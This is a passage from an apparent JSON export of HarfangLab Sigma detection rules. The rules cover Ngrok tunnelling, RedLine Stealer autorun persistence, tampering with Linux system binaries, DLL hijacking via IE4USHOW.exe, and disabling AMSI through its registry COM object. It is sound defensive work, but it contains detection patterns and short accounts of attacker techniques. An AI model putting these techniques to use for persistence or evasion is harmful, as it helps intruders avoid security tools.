60da82035702204c6219c08359c8944bbd254e6bdebc58443ad22e12019f3ab6\n ProcessImage|contains: 'AppData\\Roaming\\npm\\node_modules\\@expo\\ngrok\\node_modules\\@expo\\ngrok-bin'\n ProcessOriginalFileName: ''\n\n exclusion_defender:\n ProcessImage:\n - '?:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\\\*\\MsMpEng.exe'\n - '?:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\\\*\\NisSrv.exe'\n - '?:\\ProgramData\\Microsoft\\Windows Defender Advanced Threat Protection\\Platform\\\\*\\MsSense.exe'\n - '?:\\Program Files\\Windows Defender\\MsMpEng.exe'\n - '?:\\Program Files\\Microsoft Security Client\\MsMpEng.exe'\n - '?:\\Program Files\\Windows Defender Advanced Threat Protection\\MsSense.exe'\n ProcessSignature :\n - 'Microsoft Windows Publisher'\n - 'Microsoft Corporation'\n ProcessSigned: 'true'\n\n exclusion_nexthink:\n ProcessImage: '?:\\Program Files\\Nexthink\\Collector\\Collector\\nxtsvc.exe'\n\n exclusion_docker:\n ProcessImage: '?:\\Program Files\\Docker\\Docker\\resources\\com.docker.backend.exe'\n\n exclusion_wsl:\n ProcessImage: '?:\\Program Files\\WSL\\wslservice.exe'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "b3222cdc-4054-4f68-9306-a77d513f35a9",
"rule_name": "Ngrok Tunnel via an Uncommon Binary",
"rule_description": "This rule detects DNS requests to the official Ngrok tunnels domain via an uncommon binary.\nNgrok is a tool that allows users to expose their local servers to the internet, which enables attackers to tunnel malicious traffic through an otherwise secure network.\nIt isn't necessary to download the Ngrok binary to use an Ngrok tunnel; this can be done by creating a reverse SSH tunnel to the Ngrok servers.\nIf you believe this to be an indicator of malicious activity, you should take investigative actions.\nIt is recommended to identify the binary making the connection, the protocol used by the tunnel, the concerned users and what resources the attacker could have accessed through the tunnel.\n",
"rule_creation_date": "2023-07-13",
"rule_modified_date": "2026-02-19",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control",
"attack.exfiltration"
],
"rule_technique_tags": [
"attack.t1090",
"attack.t1567",
"attack.t1572"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "b35627f7-4023-4179-ac3f-a23860a35cfc",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.083147Z",
"creation_date": "2026-03-23T11:45:34.083149Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.083154Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://socradar.io/what-is-redline-stealer-and-what-can-you-do-about-it/",
"https://lolbas-project.github.io/lolbas/Binaries/Regsvcs/",
"https://attack.mitre.org/techniques/T1547/001/",
"https://attack.mitre.org/techniques/T1218/009/"
],
"name": "t1547_001_redline_regsvcs_autorun_key.yml",
"content": "title: Registry Autorun Key associated with RedLine Stealer\nid: b35627f7-4023-4179-ac3f-a23860a35cfc\ndescription: |\n Detects when an entry is added/modified in one of the autostart extensibility points (ASEP) in paths associated with the RedLine Stealer.\n Public samples of the RedLineStealer have been observed to set up persistence by adding Registry AutoRunKeys with RegSvcs.exe or other binaries downloaded to disk.\n The RegSvcs.exe is a legitimate binary that can be used as a LOLBin to load malicious DLLs into system processes.\n It is recommended to investigate the process tree for suspicious activities.\nreferences:\n - https://socradar.io/what-is-redline-stealer-and-what-can-you-do-about-it/\n - https://lolbas-project.github.io/lolbas/Binaries/Regsvcs/\n - https://attack.mitre.org/techniques/T1547/001/\n - https://attack.mitre.org/techniques/T1218/009/\ndate: 2023/03/04\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1547.001\n - attack.t1112\n - attack.defense_evasion\n - attack.t1218.009\n - classification.Windows.Source.Registry\n - classification.Windows.Stealer.RedLine\n - classification.Windows.LOLBin.Regsvcs\n - classification.Windows.Behavior.Persistence\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n\n selection_malbin:\n - Details|contains: '?:\\\\*\\\\*\\AppData\\Roaming\\telemetry\\svcservice.exe'\n - ProcessImage: '?:\\Users\\\\*\\Pictures\\\\*\\\\????????????????????????.exe'\n\n selection_regsvcs:\n Details|contains:\n - '?:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe'\n - '?:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\RegSvcs.exe'\n TargetObject|contains: 'SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\RegSvcs'\n\n filter_setup:\n ProcessImage|endswith:\n - '\\dotnet-sdk*.exe'\n - '\\dotnet_full*.exe'\n\n condition: selection and 1 of selection_* and not 1 of filter_*\nfalsepositives:\n - '.NET applications may create a RegSvcs.exe full path key in registry, however this is very uncommon behaviour.'\nlevel: high\n# level: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "b35627f7-4023-4179-ac3f-a23860a35cfc",
"rule_name": "Registry Autorun Key associated with RedLine Stealer",
"rule_description": "Detects when an entry is added/modified in one of the autostart extensibility points (ASEP) in paths associated with the RedLine Stealer.\nPublic samples of the RedLineStealer have been observed to set up persistence by adding Registry AutoRunKeys with RegSvcs.exe or other binaries downloaded to disk.\nThe RegSvcs.exe is a legitimate binary that can be used as a LOLBin to load malicious DLLs into system processes.\nIt is recommended to investigate the process tree for suspicious activities.\n",
"rule_creation_date": "2023-03-04",
"rule_modified_date": "2025-04-14",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1112",
"attack.t1218.009",
"attack.t1547.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "b39c44fa-4f06-491f-a0bd-53f39cb7219e",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-24T07:14:08.515171Z",
"creation_date": "2026-03-23T11:45:34.626614Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.626619Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://cloud.google.com/blog/topics/threat-intelligence/uncovering-unc3886-espionage-operations/",
"https://attack.mitre.org/techniques/T1036/005/",
"https://attack.mitre.org/techniques/T1554/"
],
"name": "t1036_005_suspicious_modification_of_essential_binaries.yml",
"content": "title: Suspicious Modification of System Binaries\nid: b39c44fa-4f06-491f-a0bd-53f39cb7219e\ndescription: |\n Detects a suspicious modification of a system binary, such as ls, ssh or bash.\n Adversaries may try to modify system binaries to steal credentials, setup persistence or provide a remotely accessible backdoor.\n It is recommended to ensure that the process writing to those binaries is a legitimate installer and that the new file isn't malicious.\nreferences:\n - https://cloud.google.com/blog/topics/threat-intelligence/uncovering-unc3886-espionage-operations/\n - https://attack.mitre.org/techniques/T1036/005/\n - https://attack.mitre.org/techniques/T1554/\ndate: 2024/06/19\nmodified: 2026/03/23\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1036.005\n - attack.persistence\n - attack.t1554\n - classification.Linux.Source.Filesystem\n - classification.Linux.Behavior.DefenseEvasion\n - classification.Linux.Behavior.Persistence\nlogsource:\n category: filesystem_event\n product: linux\ndetection:\n selection_write:\n Kind: 'access'\n Permissions: 'write'\n\n # TODO: Improve this condition when regex are fully available\n Path:\n - '/bin/ls'\n - '/sbin/ls'\n - '/usr/bin/ls'\n - '/usr/sbin/ls'\n - '/bin/cat'\n - '/sbin/cat'\n - '/usr/bin/cat'\n - '/usr/sbin/cat'\n - '/bin/sh'\n - '/sbin/sh'\n - '/usr/bin/sh'\n - '/usr/sbin/sh'\n - '/bin/bash'\n - '/sbin/bash'\n - '/usr/bin/bash'\n - '/usr/sbin/bash'\n - '/bin/dash'\n - '/sbin/dash'\n - '/usr/bin/dash'\n - '/usr/sbin/dash'\n - '/bin/sudo'\n - '/sbin/sudo'\n - '/usr/bin/sudo'\n - '/usr/sbin/sudo'\n - '/bin/su'\n - '/sbin/su'\n - '/usr/bin/su'\n - '/usr/sbin/su'\n - '/bin/cron'\n - '/sbin/cron'\n - '/usr/bin/cron'\n - '/usr/sbin/cron'\n - '/bin/ssh'\n - '/sbin/ssh'\n - '/usr/bin/ssh'\n - '/usr/sbin/ssh'\n - '/bin/sshd'\n - '/sbin/sshd'\n - '/usr/bin/sshd'\n - '/usr/sbin/sshd'\n - '/bin/telnetd'\n - '/sbin/telnetd'\n - '/usr/bin/telnetd'\n - '/usr/sbin/telnetd'\n - '/bin/busybox'\n - 
'/sbin/busybox'\n - '/usr/bin/busybox'\n - '/usr/sbin/busybox'\n - '/bin/nologin'\n - '/sbin/nologin'\n - '/usr/bin/nologin'\n - '/usr/sbin/nologin'\n - '/bin/init'\n - '/sbin/init'\n - '/usr/bin/init'\n - '/usr/sbin/init'\n - '/bin/systemd-*'\n - '/sbin/systemd-*'\n - '/usr/bin/systemd-*'\n - '/usr/sbin/systemd-*'\n - '/usr/lib/systemd/systemd-*'\n - '/usr/lib/systemd/systemd'\n\n selection_rename:\n Kind: 'rename'\n # TODO: Improve this condition when regex are fully available\n TargetPath:\n - '/bin/ls'\n - '/sbin/ls'\n - '/usr/bin/ls'\n - '/usr/sbin/ls'\n - '/bin/cat'\n - '/sbin/cat'\n - '/usr/bin/cat'\n - '/usr/sbin/cat'\n - '/bin/sh'\n - '/sbin/sh'\n - '/usr/bin/sh'\n - '/usr/sbin/sh'\n - '/bin/bash'\n - '/sbin/bash'\n - '/usr/bin/bash'\n - '/usr/sbin/bash'\n - '/bin/dash'\n - '/sbin/dash'\n - '/usr/bin/dash'\n - '/usr/sbin/dash'\n - '/bin/sudo'\n - '/sbin/sudo'\n - '/usr/bin/sudo'\n - '/usr/sbin/sudo'\n - '/bin/su'\n - '/sbin/su'\n - '/usr/bin/su'\n - '/usr/sbin/su'\n - '/bin/cron'\n - '/sbin/cron'\n - '/usr/bin/cron'\n - '/usr/sbin/cron'\n - '/bin/ssh'\n - '/sbin/ssh'\n - '/usr/bin/ssh'\n - '/usr/sbin/ssh'\n - '/bin/sshd'\n - '/sbin/sshd'\n - '/usr/bin/sshd'\n - '/usr/sbin/sshd'\n - '/bin/telnetd'\n - '/sbin/telnetd'\n - '/usr/bin/telnetd'\n - '/usr/sbin/telnetd'\n - '/bin/busybox'\n - '/sbin/busybox'\n - '/usr/bin/busybox'\n - '/usr/sbin/busybox'\n - '/bin/nologin'\n - '/sbin/nologin'\n - '/usr/bin/nologin'\n - '/usr/sbin/nologin'\n - '/bin/init'\n - '/sbin/init'\n - '/usr/bin/init'\n - '/usr/sbin/init'\n - '/bin/systemd-*'\n - '/sbin/systemd-*'\n - '/usr/bin/systemd-*'\n - '/usr/sbin/systemd-*'\n - '/usr/lib/systemd/systemd-*'\n - '/usr/lib/systemd/systemd'\n\n # Package Managers\n exclusion_dpkg:\n - ProcessImage: '/usr/bin/dpkg'\n - ProcessParentImage: '/usr/bin/dpkg'\n - ProcessGrandparentImage: '/usr/bin/dpkg'\n exclusion_dpkg_cmds_bin:\n - ProcessCommandLine|contains:\n - '/usr/bin/dpkg-'\n - '/bin/dpkg dpkg'\n - ProcessParentCommandLine|contains:\n 
- '/usr/bin/dpkg-'\n - '/bin/dpkg dpkg'\n - ProcessGrandparentCommandLine|contains:\n - '/usr/bin/dpkg-'\n - '/bin/dpkg dpkg'\n exclusion_dpkg_cmds_sbin:\n - ProcessCommandLine|contains: '/usr/sbin/dpkg-'\n - ProcessParentCommandLine|contains: '/usr/sbin/dpkg-'\n - ProcessGrandparentCommandLine|contains: '/usr/sbin/dpkg-'\n exclusion_apt:\n - ProcessImage: '/usr/bin/apt'\n - ProcessParentImage: '/usr/bin/apt'\n - ProcessGrandparentImage: '/usr/bin/apt'\n exclusion_debconf:\n - ProcessCommandLine|contains: '/usr/bin/debconf'\n - ProcessParentCommandLine|contains: '/usr/bin/debconf'\n - ProcessGrandparentCommandLine|contains: '/usr/bin/debconf'\n exclusion_dpkg_postinstall:\n - ProcessCommandLine|contains: '/var/lib/dpkg/info/*.postinst configure'\n - ProcessParentCommandLine|contains: '/var/lib/dpkg/info/*.postinst configure'\n - ProcessGrandparentCommandLine|contains: '/var/lib/dpkg/info/*.postinst configure'\n exclusion_yum:\n - ProcessCommandLine|startswith:\n - '/usr/bin/python* /bin/yum '\n - '/usr/bin/python* /usr/bin/yum '\n - '/usr/bin/python* /usr/sbin/yum-cron'\n - '/usr/libexec/platform-python /bin/yum '\n - '/usr/libexec/platform-python /usr/bin/yum '\n - ProcessParentCommandLine|startswith:\n - '/usr/bin/python* /bin/yum '\n - '/usr/bin/python* /usr/bin/yum '\n - '/usr/bin/python* /usr/sbin/yum-cron'\n - '/usr/libexec/platform-python /bin/yum '\n - '/usr/libexec/platform-python /usr/bin/yum '\n - ProcessGrandparentCommandLine|startswith:\n - '/usr/bin/python* /bin/yum '\n - '/usr/bin/python* /usr/bin/yum '\n - '/usr/bin/python* /usr/sbin/yum-cron'\n - '/usr/libexec/platform-python /bin/yum '\n - '/usr/libexec/platform-python /usr/bin/yum '\n exclusion_dnf:\n - ProcessImage:\n - '/usr/bin/tdnf'\n - '/usr/bin/dnf5'\n - ProcessCommandLine|startswith:\n - '/usr/libexec/platform-python /bin/dnf '\n - '/usr/libexec/platform-python /usr/bin/dnf '\n - '/usr/libexec/platform-python /bin/dnf-automatic '\n - '/usr/libexec/platform-python /usr/bin/dnf-automatic'\n 
- '/usr/bin/python* /bin/dnf-automatic '\n - '/usr/bin/python* /usr/bin/dnf-automatic'\n - '/usr/bin/python* /bin/dnf '\n - '/usr/bin/python* /usr/bin/dnf '\n - 'dnf upgrade'\n - 'dnf update'\n - ProcessParentCommandLine|startswith:\n - '/usr/libexec/platform-python /bin/dnf '\n - '/usr/libexec/platform-python /usr/bin/dnf '\n - '/usr/libexec/platform-python /bin/dnf-automatic '\n - '/usr/libexec/platform-python /usr/bin/dnf-automatic'\n - '/usr/bin/python? /bin/dnf-automatic '\n - '/usr/bin/python? /usr/bin/dnf-automatic'\n - '/usr/bin/python? /bin/dnf '\n - '/usr/bin/python? /usr/bin/dnf '\n - '/usr/bin/python?.? /bin/dnf '\n - '/usr/bin/python?.? /usr/bin/dnf '\n - '/usr/bin/python?.? /usr/bin/dnf-automatic'\n - 'dnf upgrade'\n - 'dnf upgrade --refresh'\n - 'dnf update'\n - ProcessGrandparentCommandLine|startswith:\n - '/usr/libexec/platform-python /bin/dnf '\n - '/usr/libexec/platform-python /usr/bin/dnf '\n - '/usr/libexec/platform-python /bin/dnf-automatic '\n - '/usr/libexec/platform-python /usr/bin/dnf-automatic'\n - '/usr/bin/python? /bin/dnf-automatic '\n - '/usr/bin/python? /usr/bin/dnf-automatic'\n - '/usr/bin/python? /bin/dnf '\n - '/usr/bin/python? /usr/bin/dnf '\n - '/usr/bin/python?.? /bin/dnf '\n - '/usr/bin/python?.? /usr/bin/dnf '\n - '/usr/bin/python?.? 
/usr/bin/dnf-automatic'\n - 'dnf upgrade'\n - 'dnf upgrade --refresh'\n - 'dnf update'\n exclusion_rpm:\n ProcessImage: '/usr/bin/rpm'\n exclusion_pacman:\n ProcessImage: '/usr/bin/pacman'\n exclusion_snapd:\n - ProcessImage:\n - '/snap/snapd/*/usr/lib/snapd/snapd'\n - '/snap/core/*/usr/lib/snapd/snapd'\n - '/usr/lib/snapd/snapd'\n - '/usr/lib/snapd/snap-update-ns'\n - '/usr/libexec/snapd/snapd'\n - '/usr/libexec/snapd/snap-update-ns'\n - '/snap/snapd/*/usr/lib/snapd/snap-update-ns'\n - ProcessParentImage:\n - '/snap/snapd/*/usr/lib/snapd/snapd'\n - '/snap/core/*/usr/lib/snapd/snapd'\n - '/usr/lib/snapd/snapd'\n - '/usr/lib/snapd/snap-update-ns'\n - '/usr/libexec/snapd/snapd'\n - '/usr/libexec/snapd/snap-update-ns'\n - '/snap/snapd/*/usr/lib/snapd/snap-update-ns'\n - ProcessGrandparentImage:\n - '/snap/snapd/*/usr/lib/snapd/snapd'\n - '/snap/core/*/usr/lib/snapd/snapd'\n - '/usr/lib/snapd/snapd'\n - '/usr/lib/snapd/snap-update-ns'\n - '/usr/libexec/snapd/snapd'\n - '/usr/libexec/snapd/snap-update-ns'\n - '/snap/snapd/*/usr/lib/snapd/snap-update-ns'\n exclusion_packagekitd:\n ProcessImage: '/usr/libexec/packagekitd'\n exclusion_flatpak:\n ProcessImage: '/usr/libexec/flatpak-system-helper'\n exclusion_apk:\n ProcessImage:\n - '/sbin/apk'\n - '/usr/sbin/apk'\n\n exclusion_hurukai:\n ProcessImage: '/opt/hurukai-agent/bin/hurukai'\n\n exclusion_systemd:\n ProcessImage: '/usr/lib/systemd/systemd'\n ProcessCommandLine|startswith: '/sbin/init'\n\n exclusion_usrmerge:\n - ProcessCommandLine: '/usr/bin/perl /usr/lib/usrmerge/convert-usrmerge'\n - ProcessParentCommandLine: '/usr/bin/perl /usr/lib/usrmerge/convert-usrmerge'\n\n exclusion_template_ansible:\n - ProcessCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/AnsiballZ_*.py'\n - ProcessParentCommandLine:\n - '/bin/sh -c /usr/bin/python* && sleep 0'\n - '/bin/sh -c /usr/libexec/platform-python && sleep 0'\n - '/bin/sh -c LANG=C /usr/bin/python* && sleep 0'\n - '/bin/sh -c LANG=C 
/usr/libexec/platform-python && sleep 0'\n - ProcessParentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentCommandLine:\n - '/bin/sh -c /usr/bin/python* && sleep 0'\n - '/bin/sh -c /usr/libexec/platform-python && sleep 0'\n - '/bin/sh -c LANG=C /usr/bin/python* && sleep 0'\n - '/bin/sh -c LANG=C /usr/libexec/platform-python && sleep 0'\n - ProcessGrandparentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentParentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentGrandparentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? 
; '\n\n exclusion_docker:\n ProcessImage:\n - '/usr/bin/dockerd'\n - '/usr/sbin/dockerd'\n - '/usr/bin/dockerd-current'\n - '/usr/sbin/dockerd-current'\n - '/usr/bin/dockerd-ce'\n - '/usr/local/bin/dockerd'\n - '/snap/docker/*/bin/dockerd'\n\n exclusion_initramfs:\n - ProcessParentCommandLine|contains:\n - '/sbin/mkinitramfs'\n - '/usr/sbin/mkinitramfs'\n - ProcessGrandparentCommandLine|contains:\n - '/sbin/mkinitramfs'\n - '/usr/sbin/mkinitramfs'\n\n exclusion_containerd:\n - ProcessImage:\n - '/usr/bin/containerd'\n - '/snap/microk8s/*/bin/containerd'\n - ProcessAncestors|contains: '|/usr/bin/runc|/usr/bin/containerd-shim-runc-v2|'\n\n exclusion_podman:\n ProcessImage: '/usr/bin/podman'\n\n exclusion_prelink:\n ProcessImage: '/usr/sbin/prelink'\n\n exclusion_qemu:\n ProcessImage: '/usr/bin/qemu-*-static'\n ProcessParentImage: '/usr/bin/qemu-*-static'\n\n exclusion_kaniko:\n ProcessImage: '/kaniko/executor'\n\n exclusion_microdnf:\n ProcessImage: '/usr/bin/microdnf'\n\n exclusion_bitdefender:\n ProcessImage: '/opt/bitdefender-security-tools/bin/bdsecd'\n\n exclusion_container:\n ProcessImage: '/usr/bin/buildah'\n\n exclusion_shim:\n ProcessParentCommandLine|startswith: '/usr/bin/containerd-shim-runc-v2 -namespace'\n\n exclusion_buildah:\n ProcessCommandLine|startswith: 'storage-untar / /'\n\n exclusion_pamac:\n ProcessImage: '/usr/bin/pamac-daemon'\n\n exclusion_timeshift:\n ProcessImage: '/usr/bin/rsync'\n ProcessAncestors|contains: '|/usr/bin/timeshift|'\n\n exclusion_pum_worker:\n ProcessCommandLine|startswith:\n - '/usr/bin/python? -Estt /usr/local/psa/admin/sbin/pum_worker '\n - '/usr/libexec/platform-python -Estt /usr/local/psa/admin/sbin/pum_worker '\n\n condition: 1 of selection_* and not 1 of exclusion_*\nlevel: high\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "b39c44fa-4f06-491f-a0bd-53f39cb7219e",
"rule_name": "Suspicious Modification of System Binaries",
"rule_description": "Detects a suspicious modification of a system binary, such as ls, ssh or bash.\nAdversaries may try to modify system binaries to steal credentials, set up persistence or provide a remotely accessible backdoor.\nIt is recommended to ensure that the process writing to those binaries is a legitimate installer and that the new file isn't malicious.\n",
"rule_creation_date": "2024-06-19",
"rule_modified_date": "2026-03-23",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1036.005",
"attack.t1554"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "b3afbd61-7d79-49a8-bc4e-716776c05d21",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.601668Z",
"creation_date": "2026-03-23T11:45:34.601672Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.601679Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://twitter.com/an0n_r0/status/1544472352657915904",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_ie4ushowi.yml",
"content": "title: DLL Hijacking via IE4USHOW.exe\nid: b3afbd61-7d79-49a8-bc4e-716776c05d21\ndescription: |\n Detects potential Windows DLL Hijacking via IE4USHOW.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://twitter.com/an0n_r0/status/1544472352657915904\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'IE4USHOWIE.EXE'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\version.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "b3afbd61-7d79-49a8-bc4e-716776c05d21",
"rule_name": "DLL Hijacking via IE4USHOW.exe",
"rule_description": "Detects potential Windows DLL Hijacking via IE4USHOW.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "b3baaf0d-46b7-451f-a695-6acea23a6bca",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.080181Z",
"creation_date": "2026-03-23T11:45:34.080183Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.080187Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://blog.sonicwall.com/en-us/2023/03/asyncrat-variant-includes-cryptostealer-capabilites/",
"https://twitter.com/M_haggis/status/1679561130438713344",
"https://attack.mitre.org/techniques/T1562/001/",
"https://attack.mitre.org/techniques/T1546/015/"
],
"name": "t1562_001_com_hijacking_amsi_registry.yml",
"content": "title: AMSI Registry COM Object Modified\nid: b3baaf0d-46b7-451f-a695-6acea23a6bca\ndescription: |\n Detects the modification of the registry value related to the Microsoft Defender Component Object Model (COM) object for AMSI.\n An adversary with administrative rights can disable the Antimalware Scan Interface (AMSI) by overriding the Microsoft Defender COM object and make it point to a DLL that does not exist.\n Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities.\n It is recommended to ensure that process has legitimate reasons to perform this action.\nreferences:\n - https://blog.sonicwall.com/en-us/2023/03/asyncrat-variant-includes-cryptostealer-capabilites/\n - https://twitter.com/M_haggis/status/1679561130438713344\n - https://attack.mitre.org/techniques/T1562/001/\n - https://attack.mitre.org/techniques/T1546/015/\ndate: 2024/02/05\nmodified: 2025/01/28\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1562.001\n - attack.t1562.006\n - attack.privilege_escalation\n - attack.persistence\n - attack.t1546.015\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.Persistence\n - classification.Windows.Behavior.PrivilegeEscalation\n - classification.Windows.Behavior.SystemModification\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: 'SetValue'\n TargetObject|endswith: '\\CLSID\\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\\InProcServer32\\(Default)'\n\n exclusion_legitimate:\n Details:\n - '%windir%\\system32\\amsi.dll'\n - 